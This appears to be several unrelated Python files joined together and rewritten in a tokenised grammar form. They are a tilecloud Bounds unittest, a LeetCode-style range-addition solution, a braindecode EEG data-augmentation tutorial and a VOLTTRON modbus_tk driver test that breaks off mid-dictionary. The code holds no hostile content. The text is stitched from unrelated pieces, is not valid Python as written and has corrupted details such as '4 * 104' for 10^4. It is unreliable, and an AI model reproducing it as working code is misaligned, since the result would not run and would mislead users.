<import_stmt>unittest<import_from_stmt>tilecloud Bounds<class_stmt>TestBounds(unittest.TestCase)<block_start><def_stmt>test_empty self<arrow><none><block_start>bounds=Bounds()<assert_stmt>len(bounds)<eq>0<assert_stmt>1<not><in>bounds<line_sep>self.assertRaises(StopIteration next iter(bounds))<assert_stmt>bounds<eq>bounds<block_end><def_stmt>test_init_one_argument self<arrow><none><block_start>bounds=Bounds(1)<assert_stmt>list(bounds)<eq>[1]<block_end><def_stmt>test_init_two_arguments self<arrow><none><block_start>bounds=Bounds(1 3)<assert_stmt>list(bounds)<eq>[1 2]<block_end><def_stmt>test_add self<arrow><none><block_start>bounds=Bounds()<assert_stmt>len(bounds)<eq>0<line_sep>bounds.add(1)<assert_stmt>list(bounds)<eq>[1]<line_sep>bounds.add(1)<assert_stmt>list(bounds)<eq>[1]<line_sep>bounds.add(2)<assert_stmt>list(bounds)<eq>[1 2]<block_end><def_stmt>test_update self<arrow><none><block_start>bounds1=Bounds(1 3)<line_sep>bounds2=Bounds(3 5)<line_sep>self.assertTrue(bounds1.update(bounds2)<is>bounds1)<line_sep>self.assertEqual(len(bounds1) 4)<line_sep>self.assertEqual(list(bounds1) [1 2 3 4])<block_end><def_stmt>test_update_empty self<arrow><none><block_start>bounds1=Bounds()<line_sep>bounds2=Bounds(3 5)<assert_stmt>bounds1.update(bounds2)<is>bounds1<assert_stmt>list(bounds1)<eq>[3 4]<block_end><def_stmt>test_union_empty_empty self<arrow><none><block_start>bounds1=Bounds()<line_sep>bounds2=Bounds()<line_sep>bounds3=bounds1.union(bounds2)<assert_stmt>bounds3<is><not>bounds1<assert_stmt>bounds3<is><not>bounds2<assert_stmt>len(bounds3)<eq>0<block_end><def_stmt>test_union_empty_normal self<arrow><none><block_start>bounds1=Bounds()<line_sep>bounds2=Bounds(3 5)<line_sep>bounds3=bounds1.union(bounds2)<assert_stmt>bounds3<is><not>bounds1<assert_stmt>bounds3<is><not>bounds2<assert_stmt>list(bounds3)<eq>[3 4]<block_end><def_stmt>test_union_normal_empty self<arrow><none><block_start>bounds1=Bounds(1 3)<line_sep>bounds2=Bounds()<line_sep>bounds3=bounds1.union(bounds2)<assert_stmt>bounds3<is><not>bounds1<assert_stmt>bounds3<is><not>bounds2<assert_stmt>list(bounds3)<eq>[1 2]<block_end><def_stmt>test_union_normal_normal self<arrow><none><block_start>bounds1=Bounds(1 3)<line_sep>bounds2=Bounds(3 5)<line_sep>bounds3=bounds1.union(bounds2)<assert_stmt>bounds3<is><not>bounds1<assert_stmt>bounds3<is><not>bounds2<assert_stmt>list(bounds3)<eq>[1 2 3 4]<block_end><block_end>
""" You are given an m x n matrix M initialized with all 0's and an array of operations ops, where ops[i] = [ai, bi] means M[x][y] should be incremented by one for all 0 <= x < ai and 0 <= y < bi. Count and return the number of maximum integers in the matrix after performing all the operations.   Example 1: Input: m = 3, n = 3, ops = [[2,2],[3,3]] Output: 4 Explanation: The maximum integer in M is 2, and there are four of it in M. So return 4. Example 2: Input: m = 3, n = 3, ops = [[2,2],[3,3],[3,3],[3,3],[2,2],[3,3],[3,3],[3,3],[2,2],[3,3],[3,3],[3,3]] Output: 4 Example 3: Input: m = 3, n = 3, ops = [] Output: 9   Constraints: 1 <= m, n <= 4 * 104 1 <= ops.length <= 104 ops[i].length == 2 1 <= ai <= m 1 <= bi <= n """<class_stmt>Solution(object)<block_start><def_stmt>maxCount self m n ops<block_start>""" :type m: int :type n: int :type ops: List[List[int]] :rtype: int """<line_sep>my,mx=m n<for_stmt>op ops<block_start>my=min(my op[0])<line_sep>mx=min(mx op[1])<block_end><return>my<times>mx<block_end><block_end>
""" Data Augmentation on BCIC IV 2a Dataset ======================================= This tutorial shows how to train EEG deep models with data augmentation. It follows the trial-wise decoding example and also illustrates the effect of a transform on the input signals. .. contents:: This example covers: :local: :depth: 2 """<line_sep># Authors: <NAME> <<EMAIL>> # <NAME> <<EMAIL>> # # License: BSD (3-clause) ###################################################################### # Loading and preprocessing the dataset # ------------------------------------- ###################################################################### # Loading # ~~~~~~~ # <import_from_stmt>braindecode EEGClassifier<import_from_stmt>skorch.helper predefined_split<import_from_stmt>skorch.callbacks LRScheduler<import_from_stmt>braindecode.datasets MOABBDataset<line_sep>subject_id=3<line_sep>dataset=MOABBDataset(dataset_name="BNCI2014001" subject_ids=[subject_id])<line_sep>###################################################################### # Preprocessing # ~~~~~~~~~~~~~ # <import_from_stmt>braindecode.preprocessing exponential_moving_standardize preprocess Preprocessor scale <line_sep>low_cut_hz=4.# low cut frequency for filtering high_cut_hz=38.# high cut frequency for filtering # Parameters for exponential moving standardization factor_new=1e-3<line_sep>init_block_size=1000<line_sep>preprocessors=[Preprocessor('pick_types' eeg=<true> meg=<false> stim=<false>) # Keep EEG sensors Preprocessor(scale factor=1e6 apply_on_array=<true>) # Convert from V to uV Preprocessor('filter' l_freq=low_cut_hz h_freq=high_cut_hz) # Bandpass filter Preprocessor(exponential_moving_standardize # Exponential moving standardization factor_new=factor_new init_block_size=init_block_size)]<line_sep>preprocess(dataset preprocessors)<line_sep>###################################################################### # Extracting windows # ~~~~~~~~~~~~~~~~~~ # <import_from_stmt>braindecode.preprocessing create_windows_from_events<line_sep>trial_start_offset_seconds=-0.5<line_sep># Extract sampling frequency, check that they are same in all datasets sfreq=dataset.datasets[0].raw.info['sfreq']<assert_stmt>all([ds.raw.info['sfreq']<eq>sfreq<for>ds dataset.datasets])<line_sep># Calculate the trial start offset in samples. trial_start_offset_samples=int(trial_start_offset_seconds<times>sfreq)<line_sep># Create windows using braindecode function for this. It needs parameters to # define how trials should be used. windows_dataset=create_windows_from_events(dataset trial_start_offset_samples=trial_start_offset_samples trial_stop_offset_samples=0 preload=<true> )<line_sep>###################################################################### # Split dataset into train and valid # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # splitted=windows_dataset.split('session')<line_sep>train_set=splitted['session_T']<line_sep>valid_set=splitted['session_E']<line_sep>###################################################################### # Defining a Transform # -------------------- # ###################################################################### # Data can be manipulated by transforms, which are callable objects. A # transform is usually handled by a custom data loader, but can also be called # directly on input data, as demonstrated below for illutrative purposes. # # First, we need to define a Transform. Here we chose the FrequencyShift, which # randomly translates all frequencies within a given range. 
<import_from_stmt>braindecode.augmentation FrequencyShift<line_sep>transform=FrequencyShift(probability=1. # defines the probability of actually modifying the input sfreq=sfreq max_delta_freq=2.# the frequency shifts are sampled now between -2 and 2 Hz )<line_sep>###################################################################### # Manipulating one session and visualizing the transformed data # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # Next, let us augment one session to show the resulting frequency shift. The # data of an mne Epoch is used here to make usage of mne functions. <import_stmt>torch<line_sep>epochs=train_set.datasets[0].windows# original epochs X=epochs.get_data()<line_sep># This allows to apply the transform with a fixed shift (10 Hz) for # visualization instead of sampling the shift randomly between -2 and 2 Hz X_tr,_=transform.operation(torch.as_tensor(X).float() <none> 10. sfreq)<line_sep>###################################################################### # The psd of the transformed session has now been shifted by 10 Hz, as one can # see on the psd plot. <import_stmt>mne<import_stmt>matplotlib.pyplot<as>plt<import_stmt>numpy<as>np<def_stmt>plot_psd data axis label color<block_start>psds,freqs=mne.time_frequency.psd_array_multitaper(data sfreq=sfreq fmin=0.1 fmax=100)<line_sep>psds=10.<times>np.log10(psds)<line_sep>psds_mean=psds.mean(0).mean(0)<line_sep>axis.plot(freqs psds_mean color=color label=label)<block_end>_,ax=plt.subplots()<line_sep>plot_psd(X ax 'original' 'k')<line_sep>plot_psd(X_tr.numpy() ax 'shifted' 'r')<line_sep>ax.set(title='Multitaper PSD (gradiometers)' xlabel='Frequency (Hz)' ylabel='Power Spectral Density (dB)')<line_sep>ax.legend()<line_sep>plt.show()<line_sep>###################################################################### # Training a model with data augmentation # --------------------------------------- # # Now that we know how to instantiate ``Transforms``, it is time to learn how # to use them to train a model and try to improve its generalization power. # Let's first create a model. # # Create model # ~~~~~~~~~~~~ # ###################################################################### # The model to be trained is defined as usual. <import_from_stmt>braindecode.util set_random_seeds<import_from_stmt>braindecode.models ShallowFBCSPNet<line_sep>cuda=torch.cuda.is_available()# check if GPU is available, if True chooses to use it device='cuda'<if>cuda<else>'cpu'<if_stmt>cuda<block_start>torch.backends.cudnn.benchmark=<true><block_end># Set random seed to be able to reproduce results seed=20200220<line_sep>set_random_seeds(seed=seed cuda=cuda)<line_sep>n_classes=4<line_sep># Extract number of chans and time steps from dataset n_channels=train_set[0][0].shape[0]<line_sep>input_window_samples=train_set[0][0].shape[1]<line_sep>model=ShallowFBCSPNet(n_channels n_classes input_window_samples=input_window_samples final_conv_length='auto' )<line_sep>###################################################################### # Create an EEGClassifier with the desired augmentation # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # ###################################################################### # In order to train with data augmentation, a custom data loader can be # for the training. Multiple transforms can be passed to it and will be applied # sequentially to the batched data within the ``AugmentedDataLoader`` object. 
<import_from_stmt>braindecode.augmentation AugmentedDataLoader SignFlip<line_sep>freq_shift=FrequencyShift(probability=.5 sfreq=sfreq max_delta_freq=2.# the frequency shifts are sampled now between -2 and 2 Hz )<line_sep>sign_flip=SignFlip(probability=.1)<line_sep>transforms=[freq_shift sign_flip]<line_sep># Send model to GPU <if_stmt>cuda<block_start>model.cuda()<block_end>###################################################################### # The model is now trained as in the trial-wise example. The # ``AugmentedDataLoader`` is used as the train iterator and the list of # transforms are passed as arguments. lr=0.0625<times>0.01<line_sep>weight_decay=0<line_sep>batch_size=64<line_sep>n_epochs=4<line_sep>clf=EEGClassifier(model iterator_train=AugmentedDataLoader # This tells EEGClassifier to use a custom DataLoader iterator_train__transforms=transforms # This sets the augmentations to use criterion=torch.nn.NLLLoss optimizer=torch.optim.AdamW train_split=predefined_split(valid_set) # using valid_set for validation optimizer__lr=lr optimizer__weight_decay=weight_decay batch_size=batch_size callbacks=["accuracy" ("lr_scheduler" LRScheduler('CosineAnnealingLR' T_max=n_epochs-1)) ] device=device )<line_sep># Model training for a specified number of epochs. `y` is None as it is already # supplied in the dataset. clf.fit(train_set y=<none> epochs=n_epochs)<line_sep>###################################################################### # Manually composing Transforms # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # It would be equivalent (although more verbose) to pass to ``EEGClassifier`` a # composition of the same transforms: <import_from_stmt>braindecode.augmentation Compose<line_sep>composed_transforms=Compose(transforms=transforms)<line_sep>###################################################################### # Setting the data augmentation at the Dataset level # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # Also note that it is also possible for most of the transforms to pass them # directly to the WindowsDataset object through the `transform` argument, as # most commonly done in other libraries. However, it is advised to use the # ``AugmentedDataLoader`` as above, as it is compatible with all transforms and # can be more efficient. train_set.transform=composed_transforms<line_sep>
<import_stmt>pytest<import_stmt>gevent<import_stmt>logging<import_stmt>time<import_from_stmt>volttron.platform get_services_core jsonapi<import_from_stmt>volttrontesting.utils.utils get_rand_ip_and_port<import_from_stmt>platform_driver.interfaces.modbus_tk.server Server<import_from_stmt>platform_driver.interfaces.modbus_tk.maps Map Catalog<import_from_stmt>volttron.platform.agent.known_identities PLATFORM_DRIVER<line_sep>logger=logging.getLogger(__name__)<line_sep>IP,_port=get_rand_ip_and_port().split(":")<line_sep>PORT=int(_port)<line_sep># New modbus_tk driver config DRIVER_CONFIG={"driver_config":{"name":"test" "device_address":IP "port":PORT "slave_id":1 "addressing":"offset" "register_map":"config://modbus_tk_map.csv"} "driver_type":"modbus_tk" "registry_config":"config://modbus_tk.csv" "interval":60 "timezone":"UTC"}<line_sep># New modbus_tk csv config REGISTRY_CONFIG_STRING="""Volttron Point Name,Register Name BRAND (),BRAND () MODEL (),MODEL () COMS STATUS (),COMS STATUS () COMS QUALITY (),COMS QUALITY () NUMBER OF QUERIES (),NUMBER OF QUERIES () NUMBER OF FAILS (),NUMBER OF FAILS () DATE LAST ACQUISITION (),DATE LAST ACQUISITION () LAST SAMPLING DURATION (s),LAST SAMPLING DURATION (s) ACCUMULATED REAL ENERGY NET (IMPORT-EXPORT) (kWh),ACCUMULATED REAL ENERGY NET (IMPORT-EXPORT) (kWh) REAL ENERGY QUADRANTS 1-4 IMPORT (kWh),REAL ENERGY QUADRANTS 1-4 IMPORT (kWh) REAL ENERGY QUADRANTS 2-3 EXPORT (kWh),REAL ENERGY QUADRANTS 2-3 EXPORT (kWh) REACTIVE ENERGY - QUADRANT 1 IMPORT (kVARh),REACTIVE ENERGY - QUADRANT 1 IMPORT (kVARh) REACTIVE ENERGY - QUADRANT 2 IMPORT (kVARh),REACTIVE ENERGY - QUADRANT 2 IMPORT (kVARh) REACTIVE ENERGY - QUADRANT 3 EXPORT (kVARh),REACTIVE ENERGY - QUADRANT 3 EXPORT (kVARh) REACTIVE ENERGY - QUADRANT 4 EXPORT (kVARh),REACTIVE ENERGY - QUADRANT 4 EXPORT (kVARh) APPARENT ENERGY NET (IMPORT/EXPORT) (kVAh),APPARENT ENERGY NET (IMPORT/EXPORT) (kVAh) APPARENT QUADRANTS 1-4 IMPORT (kVAh),APPARENT QUADRANTS 1-4 IMPORT (kVAh) APPARENT QUADRANTS 2-3 EXPORT (kVAh),APPARENT QUADRANTS 2-3 EXPORT (kVAh) TOTAL INSTANTANEOUS REAL POWER (kW),TOTAL INSTANTANEOUS REAL POWER (kW) TOTAL INSTANTANEOUS REACTIVE POWER (kVAR),TOTAL INSTANTANEOUS REACTIVE POWER (kVAR) TOTAL INSTANTANEOUS APPARENT POWER (kVA),TOTAL INSTANTANEOUS APPARENT POWER (kVA) TOTAL POWER FACTOR (-),TOTAL POWER FACTOR (-) AVERAGE VOLTAGE L-L (V),AVERAGE VOLTAGE L-L (V) AVERAGE VOLTAGE L-N (V),AVERAGE VOLTAGE L-N (V) AVERAGE CURRENT (A),AVERAGE CURRENT (A) FREQUENCY (Hz),FREQUENCY (Hz) TOTAL REAL POWER PRESENT DEMAND (kW),TOTAL REAL POWER PRESENT DEMAND (kW) TOTAL REACTIVE POWER PRESENT DEMAND (kVAR),TOTAL REACTIVE POWER PRESENT DEMAND (kVAR) TOTAL APPARENT POWER PRESENT DEMAND (kVA),TOTAL APPARENT POWER PRESENT DEMAND (kVA) TOTAL REAL POWER MAX. DEMAND IMPORT (kW),TOTAL REAL POWER MAX. DEMAND IMPORT (kW) TOTAL REACTIVE POWER MAX. DEMAND IMPORT (kVAR),TOTAL REACTIVE POWER MAX. DEMAND IMPORT (kVAR) TOTAL APPARENT POWER MAX. DEMAND IMPORT (kVA),TOTAL APPARENT POWER MAX. DEMAND IMPORT (kVA) TOTAL REAL POWER MAX. DEMAND EXPORT (kW),TOTAL REAL POWER MAX. DEMAND EXPORT (kW) TOTAL REACTIVE POWER MAX. DEMAND EXPORT (kVAR),TOTAL REACTIVE POWER MAX. DEMAND EXPORT (kVAR) TOTAL APPARENT POWER MAX. DEMAND EXPORT (kVA),TOTAL APPARENT POWER MAX. 
DEMAND EXPORT (kVA) PULSE COUNTER 1 (-),PULSE COUNTER 1 (-) PULSE COUNTER 2 (-),PULSE COUNTER 2 (-) ACCUMULATED REAL ENERGY PHASE A IMPORT (kWh),ACCUMULATED REAL ENERGY PHASE A IMPORT (kWh) ACCUMULATED REAL ENERGY PHASE B IMPORT (kWh),ACCUMULATED REAL ENERGY PHASE B IMPORT (kWh) ACCUMULATED REAL ENERGY PHASE C IMPORT (kWh),ACCUMULATED REAL ENERGY PHASE C IMPORT (kWh) ACCUMULATED REAL ENERGY PHASE A EXPORT (kWh),ACCUMULATED REAL ENERGY PHASE A EXPORT (kWh) ACCUMULATED REAL ENERGY PHASE B EXPORT (kWh),ACCUMULATED REAL ENERGY PHASE B EXPORT (kWh) ACCUMULATED REAL ENERGY PHASE C EXPORT (kWh),ACCUMULATED REAL ENERGY PHASE C EXPORT (kWh) ACCUMULATED Q1 REACTIVE ENERGY PHASE A IMPORT (kVARh),ACCUMULATED Q1 REACTIVE ENERGY PHASE A IMPORT (kVARh) ACCUMULATED Q1 REACTIVE ENERGY PHASE B IMPORT (kVARh),ACCUMULATED Q1 REACTIVE ENERGY PHASE B IMPORT (kVARh) ACCUMULATED Q1 REACTIVE ENERGY PHASE C IMPORT (kVARh),ACCUMULATED Q1 REACTIVE ENERGY PHASE C IMPORT (kVARh) ACCUMULATED Q2 REACTIVE ENERGY PHASE A IMPORT (kVARh),ACCUMULATED Q2 REACTIVE ENERGY PHASE A IMPORT (kVARh) ACCUMULATED Q2 REACTIVE ENERGY PHASE B IMPORT (kVARh),ACCUMULATED Q2 REACTIVE ENERGY PHASE B IMPORT (kVARh) ACCUMULATED Q2 REACTIVE ENERGY PHASE C IMPORT (kVARh),ACCUMULATED Q2 REACTIVE ENERGY PHASE C IMPORT (kVARh) ACCUMULATED Q3 REACTIVE ENERGY PHASE A EXPORT (kVARh),ACCUMULATED Q3 REACTIVE ENERGY PHASE A EXPORT (kVARh) ACCUMULATED Q3 REACTIVE ENERGY PHASE B EXPORT (kVARh),ACCUMULATED Q3 REACTIVE ENERGY PHASE B EXPORT (kVARh) ACCUMULATED Q3 REACTIVE ENERGY PHASE C EXPORT (kVARh),ACCUMULATED Q3 REACTIVE ENERGY PHASE C EXPORT (kVARh) ACCUMULATED Q4 REACTIVE ENERGY PHASE A EXPORT (kVARh),ACCUMULATED Q4 REACTIVE ENERGY PHASE A EXPORT (kVARh) ACCUMULATED Q4 REACTIVE ENERGY PHASE B EXPORT (kVARh),ACCUMULATED Q4 REACTIVE ENERGY PHASE B EXPORT (kVARh) ACCUMULATED Q4 REACTIVE ENERGY PHASE C EXPORT (kVARh),ACCUMULATED Q4 REACTIVE ENERGY PHASE C EXPORT (kVARh) ACCUMULATED APPARENT ENERGY PHASE A IMPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE A IMPORT (kVAh) ACCUMULATED APPARENT ENERGY PHASE B IMPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE B IMPORT (kVAh) ACCUMULATED APPARENT ENERGY PHASE C IMPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE C IMPORT (kVAh) ACCUMULATED APPARENT ENERGY PHASE A EXPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE A EXPORT (kVAh) ACCUMULATED APPARENT ENERGY PHASE B EXPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE B EXPORT (kVAh) ACCUMULATED APPARENT ENERGY PHASE C EXPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE C EXPORT (kVAh) REAL POWER PHASE A (kW),REAL POWER PHASE A (kW) REAL POWER PHASE B (kW),REAL POWER PHASE B (kW) REAL POWER PHASE C (kW),REAL POWER PHASE C (kW) REACTIVE POWER PHASE A (kVAR),REACTIVE POWER PHASE A (kVAR) REACTIVE POWER PHASE B (kVAR),REACTIVE POWER PHASE B (kVAR) REACTIVE POWER PHASE C (kVAR),REACTIVE POWER PHASE C (kVAR) APPARENT POWER PHASE A (kVA),APPARENT POWER PHASE A (kVA) APPARENT POWER PHASE B (kVA),APPARENT POWER PHASE B (kVA) APPARENT POWER PHASE C (kVA),APPARENT POWER PHASE C (kVA) POWER FACTOR PHASE A (-),POWER FACTOR PHASE A (-) POWER FACTOR PHASE B (-),POWER FACTOR PHASE B (-) POWER FACTOR PHASE C (-),POWER FACTOR PHASE C (-) VOLTAGE PHASE A-B (V),VOLTAGE PHASE A-B (V) VOLTAGE PHASE B-C (V),VOLTAGE PHASE B-C (V) VOLTAGE PHASE A-C (V),VOLTAGE PHASE A-C (V) VOLTAGE PHASE A-N (V),VOLTAGE PHASE A-N (V) VOLTAGE PHASE B-N (V),VOLTAGE PHASE B-N (V) VOLTAGE PHASE C-N (V),VOLTAGE PHASE C-N (V) CURRENT PHASE A (A),CURRENT PHASE A (A) CURRENT PHASE B (A),CURRENT PHASE B (A) CURRENT PHASE C 
(A),CURRENT PHASE C (A)"""<line_sep>REGISTER_MAP="""Register Name,Address,Type,Units,Writable,Transform,Table,Mixed Endian ACCUMULATED REAL ENERGY NET (IMPORT-EXPORT) (kWh),399,float,kWh,TRUE,,analog_output_holding_registers,TRUE REAL ENERGY QUADRANTS 1-4 IMPORT (kWh),401,float,kWh,TRUE,,analog_output_holding_registers,TRUE REAL ENERGY QUADRANTS 2-3 EXPORT (kWh),403,float,kWh,TRUE,,analog_output_holding_registers,TRUE REACTIVE ENERGY - QUADRANT 1 IMPORT (kVARh),405,float,kVARh,TRUE,,analog_output_holding_registers,TRUE REACTIVE ENERGY - QUADRANT 2 IMPORT (kVARh),407,float,kVARh,TRUE,,analog_output_holding_registers,TRUE REACTIVE ENERGY - QUADRANT 3 EXPORT (kVARh),409,float,kVARh,TRUE,,analog_output_holding_registers,TRUE REACTIVE ENERGY - QUADRANT 4 EXPORT (kVARh),411,float,kVARh,TRUE,,analog_output_holding_registers,TRUE APPARENT ENERGY NET (IMPORT/EXPORT) (kVAh),413,float,kVAh,TRUE,,analog_output_holding_registers,TRUE APPARENT QUADRANTS 1-4 IMPORT (kVAh),415,float,kVAh,TRUE,,analog_output_holding_registers,TRUE APPARENT QUADRANTS 2-3 EXPORT (kVAh),417,float,kVAh,TRUE,,analog_output_holding_registers,TRUE TOTAL INSTANTANEOUS REAL POWER (kW),419,float,kW,TRUE,,analog_output_holding_registers,TRUE TOTAL INSTANTANEOUS REACTIVE POWER (kVAR),421,float,kVAR,TRUE,,analog_output_holding_registers,TRUE TOTAL INSTANTANEOUS APPARENT POWER (kVA),423,float,kVA,TRUE,,analog_output_holding_registers,TRUE TOTAL POWER FACTOR (-),425,float,,TRUE,,analog_output_holding_registers,TRUE AVERAGE VOLTAGE L-L (V),427,float,V,TRUE,,analog_output_holding_registers,TRUE AVERAGE VOLTAGE L-N (V),429,float,V,TRUE,,analog_output_holding_registers,TRUE AVERAGE CURRENT (A),431,float,A,TRUE,,analog_output_holding_registers,TRUE FREQUENCY (Hz),433,float,Hz,TRUE,,analog_output_holding_registers,TRUE TOTAL REAL POWER PRESENT DEMAND (kW),435,float,kW,TRUE,,analog_output_holding_registers,TRUE TOTAL REACTIVE POWER PRESENT DEMAND (kVAR),437,float,kVAR,TRUE,,analog_output_holding_registers,TRUE TOTAL APPARENT POWER PRESENT DEMAND (kVA),439,float,kVA,TRUE,,analog_output_holding_registers,TRUE TOTAL REAL POWER MAX. DEMAND IMPORT (kW),441,float,kW,TRUE,,analog_output_holding_registers,TRUE TOTAL REACTIVE POWER MAX. DEMAND IMPORT (kVAR),443,float,kVAR,TRUE,,analog_output_holding_registers,TRUE TOTAL APPARENT POWER MAX. DEMAND IMPORT (kVA),445,float,kVA,TRUE,,analog_output_holding_registers,TRUE TOTAL REAL POWER MAX. DEMAND EXPORT (kW),447,float,kW,TRUE,,analog_output_holding_registers,TRUE TOTAL REACTIVE POWER MAX. DEMAND EXPORT (kVAR),449,float,kVAR,TRUE,,analog_output_holding_registers,TRUE TOTAL APPARENT POWER MAX. 
DEMAND EXPORT (kVA),451,float,kVA,TRUE,,analog_output_holding_registers,TRUE PULSE COUNTER 1 (-),453,float,,TRUE,,analog_output_holding_registers,TRUE PULSE COUNTER 2 (-),455,float,,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED REAL ENERGY PHASE A IMPORT (kWh),457,float,kWh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED REAL ENERGY PHASE B IMPORT (kWh),459,float,kWh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED REAL ENERGY PHASE C IMPORT (kWh),461,float,kWh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED REAL ENERGY PHASE A EXPORT (kWh),463,float,kWh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED REAL ENERGY PHASE B EXPORT (kWh),465,float,kWh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED REAL ENERGY PHASE C EXPORT (kWh),467,float,kWh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q1 REACTIVE ENERGY PHASE A IMPORT (kVARh),469,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q1 REACTIVE ENERGY PHASE B IMPORT (kVARh),471,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q1 REACTIVE ENERGY PHASE C IMPORT (kVARh),473,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q2 REACTIVE ENERGY PHASE A IMPORT (kVARh),475,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q2 REACTIVE ENERGY PHASE B IMPORT (kVARh),477,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q2 REACTIVE ENERGY PHASE C IMPORT (kVARh),479,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q3 REACTIVE ENERGY PHASE A EXPORT (kVARh),481,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q3 REACTIVE ENERGY PHASE B EXPORT (kVARh),483,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q3 REACTIVE ENERGY PHASE C EXPORT (kVARh),485,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q4 REACTIVE ENERGY PHASE A EXPORT (kVARh),487,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q4 REACTIVE ENERGY PHASE B EXPORT (kVARh),489,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q4 REACTIVE ENERGY PHASE C EXPORT (kVARh),491,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED APPARENT ENERGY PHASE A IMPORT (kVAh),493,float,kVAh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED APPARENT ENERGY PHASE B IMPORT (kVAh),495,float,kVAh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED APPARENT ENERGY PHASE C IMPORT (kVAh),497,float,kVAh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED APPARENT ENERGY PHASE A EXPORT (kVAh),499,float,kVAh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED APPARENT ENERGY PHASE B EXPORT (kVAh),501,float,kVAh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED APPARENT ENERGY PHASE C EXPORT (kVAh),503,float,kVAh,TRUE,,analog_output_holding_registers,TRUE REAL POWER PHASE A (kW),505,float,kW,TRUE,,analog_output_holding_registers,TRUE REAL POWER PHASE B (kW),507,float,kW,TRUE,,analog_output_holding_registers,TRUE REAL POWER PHASE C (kW),509,float,kW,TRUE,,analog_output_holding_registers,TRUE REACTIVE POWER PHASE A (kVAR),511,float,kVAR,TRUE,,analog_output_holding_registers,TRUE REACTIVE POWER PHASE B (kVAR),513,float,kVAR,TRUE,,analog_output_holding_registers,TRUE REACTIVE POWER PHASE C (kVAR),515,float,kVAR,TRUE,,analog_output_holding_registers,TRUE APPARENT POWER PHASE A (kVA),517,float,kVA,TRUE,,analog_output_holding_registers,TRUE APPARENT POWER PHASE B (kVA),519,float,kVA,TRUE,,analog_output_holding_registers,TRUE APPARENT POWER PHASE C 
(kVA),521,float,kVA,TRUE,,analog_output_holding_registers,TRUE POWER FACTOR PHASE A (-),523,float,,TRUE,,analog_output_holding_registers,TRUE POWER FACTOR PHASE B (-),525,float,,TRUE,,analog_output_holding_registers,TRUE POWER FACTOR PHASE C (-),527,float,,TRUE,,analog_output_holding_registers,TRUE VOLTAGE PHASE A-B (V),529,float,V,TRUE,,analog_output_holding_registers,TRUE VOLTAGE PHASE B-C (V),531,float,V,TRUE,,analog_output_holding_registers,TRUE VOLTAGE PHASE A-C (V),533,float,V,TRUE,,analog_output_holding_registers,TRUE VOLTAGE PHASE A-N (V),535,float,V,TRUE,,analog_output_holding_registers,TRUE VOLTAGE PHASE B-N (V),537,float,V,TRUE,,analog_output_holding_registers,TRUE VOLTAGE PHASE C-N (V),539,float,V,TRUE,,analog_output_holding_registers,TRUE CURRENT PHASE A (A),541,float,A,TRUE,,analog_output_holding_registers,TRUE CURRENT PHASE B (A),543,float,A,TRUE,,analog_output_holding_registers,TRUE CURRENT PHASE C (A),545,float,A,TRUE,,analog_output_holding_registers,TRUE"""<line_sep># Register values dictionary for testing set_point and get_point registers_dict={"ACCUMULATED REAL ENERGY NET (IMPORT-EXPORT) (kWh)":74.0 "REAL ENERGY QUADRANTS 1-4 IMPORT (kWh)":73.0 "REAL ENERGY QUADRANTS 2-3 EXPORT (kWh)":72.0 "REACTIVE ENERGY - QUADRANT 1 IMPORT (kVARh)":71.0 "REACTIVE ENERGY - QUADRANT 2 IMPORT (kVARh)":70.0 "REACTIVE ENERGY - QUADRANT 3 EXPORT (kVARh)":69.0 "REACTIVE ENERGY - QUADRANT 4 EXPORT (kVARh)":68.0 "APPARENT ENERGY NET (IMPORT/EXPORT) (kVAh)":67.0 "APPARENT QUADRANTS 1-4 IMPORT (kVAh)":66.0 "APPARENT QUADRANTS 2-3 EXPORT (kVAh)":65.0 "TOTAL INSTANTANEOUS REAL POWER (kW)":64.0 "TOTAL INSTANTANEOUS REACTIVE POWER (kVAR)":63.0 "TOTAL INSTANTANEOUS APPARENT POWER (kVA)":62.0 "TOTAL POWER FACTOR (-)":61.0 "AVERAGE VOLTAGE L-L (V)":60.0 "AVERAGE VOLTAGE L-N (V)":59.0 "AVERAGE CURRENT (A)":58.0 "FREQUENCY (Hz)":57.0 "TOTAL REAL POWER PRESENT DEMAND (kW)":56.0 "TOTAL REACTIVE POWER PRESENT DEMAND (kVAR)":55.0 "TOTAL APPARENT POWER PRESENT DEMAND (kVA)":54.0 "TOTAL REAL POWER MAX. DEMAND IMPORT (kW)":53.0 "TOTAL 